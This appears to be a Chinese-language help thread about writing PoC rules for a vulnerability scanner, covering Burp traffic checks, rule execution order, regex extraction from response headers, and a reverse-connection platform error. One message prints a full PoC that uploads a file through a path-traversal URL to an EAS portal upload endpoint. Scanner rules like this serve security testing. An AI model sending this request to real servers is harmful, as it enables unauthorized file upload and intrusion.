求怕累

你这个可以burp抓包看下流量，看返回包里面是有 未指定业务，这几个字吗，如果是乱码就会不匹配

好的

没发现差异，使用对比工具也没有发现问题 

poc格式是这样的 name: upload rules: - method: POST path: /easportal/buffalo/%2e%2e/cm/myUploadFile.do headers: Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx body: | ------WebKitFormBoundarySq4lDnabv8CwHfvx Content-Disposition: form-data; name="myFile"; filename="qcge.txt" Content-Type: text/html nicai ------WebKitFormBoundarySq4lDnabv8CwHfvx-- expression: | response.status == 200

好的，谢谢

还是只执行规则1，规则2不执行

search语法 "code_uid":"(?P.+?)"，body里面的内容可以获取到，header里面的内容获取不到加.bmatches(response.headers)，也获取不到

好的，我在看看，谢谢

好的，谢谢，麻烦大佬了

大佬，反连平台，-dns ，报错